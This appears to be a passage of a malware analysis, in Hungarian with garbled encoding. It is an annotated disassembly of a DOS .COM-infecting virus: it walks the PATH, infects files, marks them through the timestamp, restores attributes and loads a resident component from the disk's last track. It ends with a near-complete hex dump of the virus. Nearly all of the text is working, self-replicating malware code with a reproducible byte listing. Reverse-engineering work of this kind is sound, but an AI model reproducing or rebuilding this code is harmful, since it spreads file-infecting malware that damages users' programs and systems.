0150 B90400 MOV CX,0004 ;M‚g 4 bet<65> azonosˇt sa
|
||||
0153 AC LODSB ;AL=DS:[SI],SI++
|
||||
0154 AE SCASB ;AL-ES:[DI],DI++
|
||||
0155 75ED JNZ 0144 ;Ugr s, ha a k”vetkez” 4 bet<65> nem
|
||||
;egyezik (nem 'ATH=')
|
||||
0157 E2FA LOOP 0153
|
||||
0159 5E POP SI ;ES:DI mutat az els” PATH-ra
|
||||
015A 07 POP ES
|
||||
015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F)
|
||||
|
||||
|
||||
015F 8BFE MOV DI,SI ;{Hogy ez minek ? K‚s”bb Łgyis
|
||||
0161 81C71F00 ADD DI,001F ;fel<65>lˇrja} FILE_PATH (0318)
|
||||
0165 8BDE MOV BX,SI ;Ezut n BX mutat az adatokra
|
||||
0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat
|
||||
016B 8BFE MOV DI,SI ;{Az el”bb m r be llitotta (?)}
|
||||
016D EB3A JMP 01A9
|
||||
|
||||
|
||||
;A k”vetkez” PATH-ban megadott aldirectoryt FILE_PATH-ra m -
|
||||
;solja. Igy a k”vetkez” fileokat m r ebben az aldirectoryban
|
||||
;fogja keresni.
|
||||
|
||||
016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F)
|
||||
0174 7503 JNZ 0179
|
||||
0176 E96001 JMP 02D9 ;Ugr s, ha nincs t”bb PATH aldir.
|
||||
;(mindet megfert”te m r)
|
||||
0179 1E PUSH DS
|
||||
017A 56 PUSH SI
|
||||
017B 26 ES:
|
||||
017C 8E1E2C00 MOV DS,[002C] ;Environment segmense
|
||||
0180 8BFE MOV DI,SI ;(02F9)
|
||||
0182 26 ES:
|
||||
0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F)
|
||||
0187 81C71F00 ADD DI,001F ;FILE_PATH cˇme (0318)
|
||||
018B AC LODSB ;AL=DS:[SI] SI++
|
||||
018C 3C3B CMP AL,3B ;';'
|
||||
018E 740A JZ 019A
|
||||
0190 3C00 CMP AL,00
|
||||
0192 7403 JZ 0197
|
||||
0194 AA STOSB ;ES:[DI]:=AL DI++
|
||||
0195 EBF4 JMP 018B ;Źtm sol s ';' vagy #0-ig
|
||||
|
||||
;#0-val z rult a PATH bejegyz‚s => nem lesz t”bb
|
||||
0197 BE0000 MOV SI,0000
|
||||
019A 5B POP BX ;Ezut n BX mutat az adatokra
|
||||
019B 1F POP DS
|
||||
019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0
|
||||
;( Nincs t”bb PATH jelz‚s )
|
||||
|
||||
;A k”vetkez” PATH-ban adott aldir. m r tm solva.
|
||||
01A0 807DFF5C CMP BYTE PTR [DI-01],5C
|
||||
01A4 7403 JZ 01A6 ;Ugr s, ha az ut˘ls˘ bet<65> a '\'
|
||||
01A6 B05C MOV AL,5C ;Egy‚bk‚nt '\' ˇr s
|
||||
01A8 AA STOSB ;ES:[DI]:=AL DI++
|
||||
|
||||
|
||||
|
||||
|
||||
;Egy aldirectory ki‚rt‚kel‚se . El”sz”r az aktu lis , majd a
|
||||
;FILE_PATH -ra m solt aldirectory v‚gign‚z‚se, fert”z‚s.
|
||||
;DI a FILE_PATH-ba ˇrt aldirectory neve ut ni pozici˘ra mutat.
|
||||
|
||||
|
||||
;A COM kiterjeszt‚s<E2809A> fileok megkeres‚se:
|
||||
|
||||
01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311)
|
||||
;Ide kell majd a file nev‚t
|
||||
;m solni (az aldir. neve ut n)
|
||||
01AD 8BF3 MOV SI,BX ;(02F9)
|
||||
01AF 81C61000 ADD SI,0010 ;KERES_STR (0309)
|
||||
01B3 B90600 MOV CX,0006 ;6 bet<65> tm sol sa ('*.COM',0)
|
||||
01B6 F3 REPZ ;A PATH-ban megadott aldirectory
|
||||
01B7 A4 MOVSB ;m”g‚ , ˇgy teljes keres‚si utunk
|
||||
;lesz
|
||||
01B8 8BF3 MOV SI,BX ;(02F9)
|
||||
01BA B44E MOV AH,4E ;FIND FIRST ENTRY
|
||||
01BC BA1F00 MOV DX,001F
|
||||
01BF 90 NOP
|
||||
01C0 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY
|
||||
01C5 CD21 INT 21 ;Az els” COM kiterjeszt‚s<E2809A> file
|
||||
;megkeres‚se . A file adatait a DTA
|
||||
; ltal mutatott cˇmre (ENTRY 0358)
|
||||
;m solja.
|
||||
01C7 EB04 JMP 01CD
|
||||
|
||||
|
||||
;K”vetkez” COM file keres‚se (adatai ENTRY-re ker<65>lnek).
|
||||
|
||||
01C9 B44F MOV AH,4F ;FIND NEXT
|
||||
01CB CD21 INT 21
|
||||
01CD 7302 JNB 01D1
|
||||
01CF EB9E JMP 016F ;Ha nem tal l t”bb COM filet : —j
|
||||
;aldirt keres a PATH-ban
|
||||
|
||||
|
||||
;M r tal lt COM filet. Adataival az ENTRY fel van t”ltve.Ennek
|
||||
;a filenak az ellen”rz‚se, fert”z‚se k”vetkezik.
|
||||
|
||||
;Annak ellen”rz‚se , hogy a file megfert”zhet”-e (fert”z”tt-e,
|
||||
;tŁl hosszŁ-e, tŁl r”vid-e) . Ha nem fert”zhet” visszaugrik Łj
|
||||
;fileokat keresni.
|
||||
|
||||
01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje
|
||||
01D5 241F AND AL,1F
|
||||
01D7 3C1F CMP AL,1F ;Ugr s, ha az als˘ 5 bit 1-es:
|
||||
01D9 74EE JZ 01C9 ;a file m r fert”z”tt.
|
||||
01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372)
|
||||
01E1 77E6 JA 01C9 ;Ugr s, ha file hossza nagyobb,mint
|
||||
;64000h (m r nem f‚r bele a vˇrus)
|
||||
01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372)
|
||||
01E8 72DF JB 01C9 ;Ugr s, ha r”videbb 10h byten l
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Megvan a kiv laszott file.
|
||||
;-----------------------------------------
|
||||
|
||||
;A file nev‚t az aldirectory neve ut n kell m solni , hogy a
|
||||
;teljes Łt rendelkez‚s<E2809A>nkre lljon , ˇgy majd meg tudja nyitni
|
||||
;a filet.
|
||||
01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja
|
||||
01EE 56 PUSH SI ;a file nev‚t m solni
|
||||
01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376)
|
||||
|
||||
01F3 AC LODSB ;AL:=DS:[SI] SI++
|
||||
01F4 AA STOSB ;ES:[DI]:=AL DI++ (M sol s)
|
||||
01F5 3C00 CMP AL,00 ;N‚vlez r˘ 0-ig m sol
|
||||
01F7 75FA JNZ 01F3
|
||||
01F9 5E POP SI ;SI Łjra az adatokra mutat
|
||||
|
||||
|
||||
;A file egyes eredeti inform ci˘inak meg”rz‚se , hogy a fert”-
|
||||
;z‚s ne t<>nj”n fel.
|
||||
|
||||
;Az eredeti attributtum meg”rz‚se:
|
||||
|
||||
;{Fogalmam sincs mi‚rt kell a file attributtum t m‚g egyszer
|
||||
;lek‚rdezni , amikor az ENTRY ter<65>leten megtal lhat˘ . Tal n a
|
||||
;vˇrus ˇr˘ja nem tudta?}
|
||||
01FA B80043 MOV AX,4300 ;File attributtum nak lek‚rdez‚se
|
||||
01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318)
|
||||
0200 90 NOP ;{piszok}
|
||||
0201 03D6 ADD DX,SI ;DS:DX mutat a file Łtj ra
|
||||
0203 CD21 INT 21 ;CX-ben az attributtum
|
||||
0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301)
|
||||
|
||||
|
||||
;A file ˇr sv‚delm‚nek t”rl‚se:
|
||||
|
||||
0209 B80143 MOV AX,4301 ;File attributtum nak llit sa
|
||||
020C 81E1FEFF AND CX,FFFE ;Read Only jelz‚s t”rl‚se
|
||||
0210 BA1F00 MOV DX,001F ;{ Az el”bb m r be llˇtotta, minek
|
||||
0213 90 NOP ;Łjra? }
|
||||
0214 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
0216 CD21 INT 21
|
||||
|
||||
|
||||
;File megnyit sa:
|
||||
|
||||
0218 B8023D MOV AX,3D02 ;File megnyit sa ˇr sra, olvas sra
|
||||
021B BA1F00 MOV DX,001F ;{M‚g egyszer be llˇtja!}
|
||||
021E 90 NOP ;{piszok}
|
||||
021F 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
0221 CD21 INT 21
|
||||
0223 7303 JNB 0228
|
||||
0225 E9A200 JMP 02CA ;Hib n l: nincs fert”z‚s
|
||||
0228 8BD8 MOV BX,AX ;Handle
|
||||
|
||||
|
||||
;A file eredeti (mostani) idej‚nek lek‚rdez‚se:
|
||||
|
||||
;{Ez is megtal lhat˘ lenne az ENTRY ter<65>leten!}
|
||||
022A B80057 MOV AX,5700 ;Get Date & Time
|
||||
022D CD21 INT 21
|
||||
022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD)
|
||||
0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF)
|
||||
|
||||
|
||||
;Annak eld”nt‚se , hogy a kiv lasztott filet t”nkretegye-e ,
|
||||
;vagy megfert”zze . Lek‚rdezi a jelenlegi id”t , ‚s ha m sod-
|
||||
;perceinek sz ma 8-cal oszthat˘ , akkor a filet resetel”v‚ te-
|
||||
;szi, egy‚bk‚nt pedig megfert”zi. Igy az esetek 2/15-”d r‚sz‚-
|
||||
;ben teszi csak t”nkre a filet.
|
||||
|
||||
0237 B42C MOV AH,2C ;A mostani id” lek‚rdez‚se
|
||||
0239 CD21 INT 21
|
||||
023B 80E607 AND DH,07 ;A m sodpercek als˘ 3 bitje
|
||||
023E EB0D JMP 024D ;Fert”z‚s
|
||||
0240 90 NOP
|
||||
|
||||
|
||||
; Szem‚t a Reselet”lb”l
|
||||
|
||||
0241 B440 MOV AH,40
|
||||
0243 B90500 MOV CX,0005
|
||||
0246 8BD6 MOV DX,SI
|
||||
0248 81C28A00 ADD DX,008A
|
||||
024C 90 NOP
|
||||
|
||||
;-----------------------------------------
|
||||
; Fert”z‚s:
|
||||
;-----------------------------------------
|
||||
|
||||
|
||||
;Az eredeti file els” 3 bytej nak meg”rz‚se , hogy k‚s”bb m‚g
|
||||
;futtatni lehessen.
|
||||
024D B43F MOV AH,3F ;Olvas s fileb˘l
|
||||
024F B90300 MOV CX,0003 ;Az els” 3 byte beolvas sa
|
||||
0252 BA0A00 MOV DX,000A
|
||||
0255 90 NOP ;{piszok}
|
||||
0256 03D6 ADD DX,SI ;ERE_KEZD (0303)
|
||||
0258 CD21 INT 21
|
||||
025A 7255 JB 02B1 ;Hib n l v‚ge
|
||||
025C 3D0300 CMP AX,0003
|
||||
025F 7550 JNZ 02B1 ;Hib n l v‚ge
|
||||
|
||||
|
||||
;File v‚g‚re ll s, az Łj cˇmek kisz mˇt sa:
|
||||
|
||||
0261 B80242 MOV AX,4202 ;File Pointer file v‚g‚re llˇt sa
|
||||
0264 B90000 MOV CX,0000
|
||||
0267 BA0000 MOV DX,0000
|
||||
026A CD21 INT 21
|
||||
026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!}
|
||||
|
||||
|
||||
;A file elej‚re irand˘ JMP operandus nak kisz mˇt sa:
|
||||
|
||||
026E 8BC8 MOV CX,AX ;AX-ben a file hossza
|
||||
0270 2D0300 SUB AX,0003 ;AX-ben az eltol s a JMP utasˇt s-
|
||||
;hoz, ahhoz amit a file elej‚re fog
|
||||
;majd ˇrni . Igy ez a JMP a file
|
||||
;mostani v‚ge ut ni bytera fog mu-
|
||||
;tatni.
|
||||
0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307)
|
||||
|
||||
|
||||
;Az Łj fileon bel<65>li adatter<65>let cˇm‚nek kisz mˇt sa ‚s be l-
|
||||
;lˇt sa:
|
||||
|
||||
0277 81C1F902 ADD CX,02F9 ;CX az Łj fileon bel<65>li adatter<65>-
|
||||
027B 8BFE MOV DI,SI ;letre mutat.
|
||||
027D 81EFF701 SUB DI,01F7 ;A vˇrus els” utasˇt s nak (MOV DX,
|
||||
;02F9) operandus nak cˇme.
|
||||
0281 890D MOV [DI],CX ;Ide ˇrja az adatter<65>let cˇm‚t
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; A vˇrus hozz m solja mag t a filehoz:
|
||||
;-----------------------------------------
|
||||
|
||||
;(A filemutat˘ a file v‚g‚re mutat.)
|
||||
0283 B440 MOV AH,40 ;Ir s fileba.
|
||||
0285 B93603 MOV CX,0336 ;822 byte (a vˇrus hossza)
|
||||
0288 8BD6 MOV DX,SI
|
||||
028A 81EAF901 SUB DX,01F9 ;DX a vˇrus els” bytej ra mutat
|
||||
028E CD21 INT 21
|
||||
0290 721F JB 02B1 ;Hib n l v‚ge
|
||||
0292 3D3603 CMP AX,0336
|
||||
0295 751A JNZ 02B1 ;Ha nem ˇrta ki mind a 648 byteot
|
||||
|
||||
|
||||
;Az els” 3 byte t llˇt sa, egy a file v‚g‚re mutat˘ ugr˘ uta-
|
||||
;sˇt sra:
|
||||
|
||||
0297 B80042 MOV AX,4200 ;A file pointer a file elej‚re!
|
||||
029A B90000 MOV CX,0000
|
||||
029D BA0000 MOV DX,0000
|
||||
02A0 CD21 INT 21
|
||||
02A2 720D JB 02B1 ;{Itt sem lehet hiba!}
|
||||
|
||||
02A4 B440 MOV AH,40 ;Ir s fileba
|
||||
02A6 B90300 MOV CX,0003 ;3 byte
|
||||
02A9 8BD6 MOV DX,SI
|
||||
02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr˘ utasˇt sra
|
||||
02AF CD21 INT 21 ;mutat
|
||||
|
||||
|
||||
;Az eredeti id” ( m r a fert”z‚sjelz‚ssel egy<67>tt ) vissza llˇ-
|
||||
;t sa:
|
||||
|
||||
02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF)
|
||||
02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D)
|
||||
02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!}
|
||||
02BD 81C91F00 OR CX,001F ;M r volt fert”zve jelz‚s
|
||||
02C1 B80157 MOV AX,5701 ;Set Date & Time
|
||||
02C4 CD21 INT 21
|
||||
|
||||
|
||||
;A file lez r sa:
|
||||
|
||||
02C6 B43E MOV AH,3E ;Close Handle
|
||||
02C8 CD21 INT 21
|
||||
|
||||
|
||||
;Az eredeti attributtum vissza llˇt sa:
|
||||
|
||||
02CA B80143 MOV AX,4301 ;Set File Attributtum
|
||||
02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301)
|
||||
02D1 BA1F00 MOV DX,001F
|
||||
02D4 90 NOP
|
||||
02D5 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
02D7 CD21 INT 21
|
||||
|
||||
|
||||
;DTA vissza llˇt sa az eredeti cˇmre:
|
||||
|
||||
02D9 1E PUSH DS
|
||||
02DA B41A MOV AH,1A ;Set DTA
|
||||
02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9)
|
||||
02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB)
|
||||
02E4 CD21 INT 21
|
||||
02E6 1F POP DS
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Az eredeti program futtat sa:
|
||||
;-----------------------------------------
|
||||
|
||||
02E7 59 POP CX ;CX vissza llˇt sa
|
||||
02E8 33C0 XOR AX,AX ;Regiszterek null z sa
|
||||
02EA 33DB XOR BX,BX
|
||||
02EC 33D2 XOR DX,DX
|
||||
02EE 33F6 XOR SI,SI
|
||||
02F0 BF0001 MOV DI,0100
|
||||
02F3 57 PUSH DI ;0100 a stackre
|
||||
02F4 33FF XOR DI,DI
|
||||
02F6 C2FFFF RET FFFF ;100-on folytat˘dik a vez‚rl‚s
|
||||
;SP-- {Hogy minek?}
|
||||
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; ADAT TERšLET
|
||||
;-----------------------------------------
|
||||
|
||||
|
||||
;Ide mutat (02F9-re) a vˇrus elej‚n DX, k‚s”bb SI,BX.
|
||||
|
||||
02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cˇme
|
||||
02FB ERE_DTA_SEG DW (?) ;[SI+02]
|
||||
|
||||
02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje,
|
||||
02FF ERE_DATE DW (?) ;[SI+06] d tuma,
|
||||
0301 ERE_ATTR DW (?) ;[SI+08] attributtuma
|
||||
|
||||
0303 ERE_KEZD DB 3 DUP (?) ;[SI+0A]
|
||||
;A file eredeti els” 3 byteja.
|
||||
|
||||
;A k”vetkez” 3 byteon lesz az a 3 byte , amit a vˇrus egy meg-
|
||||
;fert”zend” file elej‚re fog ˇrni.
|
||||
|
||||
0306 B_JMP DB E9 ;[SI+0D]
|
||||
;JMP g‚pik˘dja
|
||||
0307 CIM_JMP DW (?) ;Eltol s (JMP operandusa)
|
||||
|
||||
0309 KERES_STR DB '*.COM',0 ;[SI+10]
|
||||
;Ezt a stringet m solja a
|
||||
;FILE_NEV_MUT cˇmre
|
||||
|
||||
030F PATH_MUT DW (?) ;[SI+16]
|
||||
;Hol a k”vetkez” aldirectory neve
|
||||
;az environmenten.
|
||||
|
||||
0311 FILE_NEV_MUT DW (?) ;[SI+18]
|
||||
;Az tm solt aldirectory m”g‚ mu-
|
||||
;tat.
|
||||
;Azt mutatja , hogy hova kell a
|
||||
;keres‚si stringet(*.COM), majd a
|
||||
;file nev‚t m solni a FILE_PATH-
|
||||
;on bel<65>l ahhoz, hogy teljes utat
|
||||
;kapjunk.
|
||||
|
||||
0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az
|
||||
;environment ter<65>leten.
|
||||
|
||||
0318 FILE_PATH DB 40 DUP (?);[SI+1F]
|
||||
;Itt lesz majd a keres‚si string
|
||||
;‚s a fert”zend” file neve Łttal
|
||||
;egy<67>tt.
|
||||
|
||||
|
||||
;Ide mutat a DTA. Ezt a ter<65>letet fogja a DOS a file adataival
|
||||
;felt”lteni.
|
||||
|
||||
0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F]
|
||||
036D ENT_ATTR DB (?) ;Attributtum [SI+74]
|
||||
036E ENT_IDO DW (?) ;Keletkez‚s ideje [SI+75]
|
||||
0370 ENT_DATUM DW (?) ;Keletkez‚s d tuma [SI+77]
|
||||
0372 ENT_HOSSZ DW (?) ;Als˘ sz˘ [SI+79]
|
||||
0374 DW (?) ;Fels” sz˘ [SI+7B]
|
||||
0376 ENT_NEV DB 0D DUP (?);Megtal lt file neve [SI+7D]
|
||||
|
||||
0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A]
|
||||
;Nem haszn lja
|
||||
|
||||
;----------------------------------------------------
|
||||
; A T”lt”get”t behŁz˘ r‚sz
|
||||
;----------------------------------------------------
|
||||
|
||||
|
||||
0388 50 PUSH AX ;Regiszterek elment‚se
|
||||
0389 53 PUSH BX
|
||||
038A 51 PUSH CX
|
||||
038B 52 PUSH DX
|
||||
038C 06 PUSH ES
|
||||
038D 1E PUSH DS
|
||||
038E 57 PUSH DI
|
||||
038F 56 PUSH SI
|
||||
0390 E80000 CALL 0393 ;Lebuk s !! (/g)
|
||||
0393 5B POP BX ;BX=0393
|
||||
|
||||
;A: BOOT beolvas sa/T”lt”get” lek‚rdez‚se
|
||||
|
||||
0394 BEA55A MOV SI,5AA5 ;T”lt”get” lek‚rdez‚se
|
||||
0397 BFAA55 MOV DI,55AA
|
||||
039A 0E PUSH CS
|
||||
039B 07 POP ES
|
||||
039C 81C3E803 ADD BX,03E8 ;BX=077B
|
||||
03A0 81FBE803 CMP BX,03E8
|
||||
03A4 7303 JNB 03A9
|
||||
03A6 E98200 JMP 042B ;Ha nincs el‚g szabad mem˘ria a szegmensen
|
||||
03A9 53 PUSH BX
|
||||
03AA B80102 MOV AX,0201 ;A:BOOT beolvas sa
|
||||
03AD BA0000 MOV DX,0000
|
||||
03B0 B90100 MOV CX,0001
|
||||
03B3 CD13 INT 13
|
||||
03B5 5B POP BX
|
||||
03B6 7308 JNB 03C0
|
||||
03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba
|
||||
03BB 74EC JZ 03A9
|
||||
03BD EB6C JMP 042B ;Val˘di hiba->v‚ge
|
||||
03BF 90 NOP
|
||||
03C0 81FE5AA5 CMP SI,A55A
|
||||
03C4 7465 JZ 042B ;V‚ge, ha a T”lt”get” m r a mem˘ri ban van
|
||||
|
||||
;Van-e el‚g szabad mem˘ria a T”lt”get” beolvas s hoz
|
||||
|
||||
03C6 8CC8 MOV AX,CS
|
||||
03C8 050010 ADD AX,1000
|
||||
03CB 53 PUSH BX
|
||||
03CC 50 PUSH AX
|
||||
03CD CD12 INT 12 ;Max mem.
|
||||
03CF BB4000 MOV BX,0040
|
||||
03D2 F7E3 MUL BX ;AX-ben a mem˘ria tetej‚nek szegmense
|
||||
03D4 2D0010 SUB AX,1000 ;legal bb 4Kb kell a T”lt”get”nek
|
||||
03D7 8BD8 MOV BX,AX
|
||||
03D9 58 POP AX ;CS+1000
|
||||
03DA 3BD8 CMP BX,AX
|
||||
03DC 7304 JNB 03E2
|
||||
03DE 5B POP BX
|
||||
03DF EB4A JMP 042B ;V‚ge, ha nincs el‚g szabad mem˘ria
|
||||
03E1 90 NOP
|
||||
|
||||
; A lemez ut˘ls˘ s vj nak megkeres‚se
|
||||
|
||||
03E2 5B POP BX ;BX=077B
|
||||
03E3 8EC0 MOV ES,AX ;Max mem-1000
|
||||
03E5 2E CS:
|
||||
03E6 8B4718 MOV AX,[BX+18] ;S v hossza
|
||||
03E9 2E CS:
|
||||
03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak sz ma
|
||||
03ED F7E1 MUL CX
|
||||
03EF 8BC8 MOV CX,AX ;Egy cilinder nagys ga
|
||||
03F1 2E CS:
|
||||
03F2 8B4713 MOV AX,[BX+13] ;Szektorok sz ma
|
||||
03F5 BA0000 MOV DX,0000
|
||||
03F8 F7F1 DIV CX ;Osztva a cilinder nagys g val AL-ben a s v
|
||||
|
||||
; Az ut˘ls˘ s v beolvas sa
|
||||
|
||||
03FA 81EBE803 SUB BX,03E8 ;BX=0393
|
||||
03FE 53 PUSH BX
|
||||
03FF 8AE8 MOV CH,AL ;40/80-dik s v
|
||||
0401 B101 MOV CL,01
|
||||
0403 BB0001 MOV BX,0100 ;ES:BX-re olvas !
|
||||
0406 BA0000 MOV DX,0000
|
||||
0409 B80802 MOV AX,0208 ;8 szektor beolvas sa
|
||||
040C CD13 INT 13
|
||||
040E 5B POP BX
|
||||
040F 721A JB 042B ;Hib n l v‚ge
|
||||
|
||||
; Ha a T”lt”get”t tal l, elindˇtja
|
||||
|
||||
0411 53 PUSH BX
|
||||
0412 BB0001 MOV BX,0100
|
||||
0415 26 ES:
|
||||
0416 8B07 MOV AX,[BX]
|
||||
0418 3D5224 CMP AX,2452 ;Azonosˇt˘
|
||||
041B 5B POP BX
|
||||
041C 750D JNZ 042B ;Ha nem T”lt”get”
|
||||
041E 8BC3 MOV AX,BX
|
||||
0420 059800 ADD AX,0098 ;AX=042B (A visszat‚r‚sre mutat)
|
||||
0423 0E PUSH CS
|
||||
0424 50 PUSH AX
|
||||
0425 B80A01 MOV AX,010A ;T”lt”get” bel‚p‚si pontja
|
||||
0428 06 PUSH ES
|
||||
0429 50 PUSH AX
|
||||
042A CB RETF
|
||||
|
||||
; Visszat‚r‚s
|
||||
|
||||
042B 5E POP SI ;Regiszterek vissza
|
||||
042C 5F POP DI
|
||||
042D 1F POP DS
|
||||
042E 07 POP ES
|
||||
042F 5A POP DX
|
||||
0430 59 POP CX
|
||||
0431 5B POP BX
|
||||
0432 58 POP AX
|
||||
0433 C3 RET
|
||||
0434 0000 DW 0000 ;???
|
||||
|
||||
|
||||
A vˇrus hexa dumpja :
|
||||
|
||||
|
||||
0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q...............
|
||||
0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u....
|
||||
0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X.
|
||||
0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V..,
|
||||
0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V..........
|
||||
0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^......
|
||||
0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:.
|
||||
0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,.
|
||||
0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t.
|
||||
0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[.....
|
||||
01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........
|
||||
01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N....
|
||||
01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s..
|
||||
01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y..
|
||||
01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V.
|
||||
01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C...
|
||||
0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C....
|
||||
0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=.....
|
||||
0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!.
|
||||
0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!.....
|
||||
0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?.
|
||||
0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u
|
||||
0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC..
|
||||
0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -...............
|
||||
0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........!
|
||||
0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B......
|
||||
02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@..........
|
||||
02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !...............
|
||||
02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C...
|
||||
02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!.......
|
||||
02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3.
|
||||
02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...!
|
||||
0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q
|
||||
0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO
|
||||
0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM.
|
||||
0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
|
||||
0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
|
||||
0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .???????
|
||||
0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so ..
|
||||
0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM.
|
||||
0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV
|
||||
0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U......
|
||||
03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S......
|
||||
03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l.
|
||||
03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP...
|
||||
03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[.
|
||||
03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O....
|
||||
03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S.
|
||||
0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r
|
||||
0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u...
|
||||
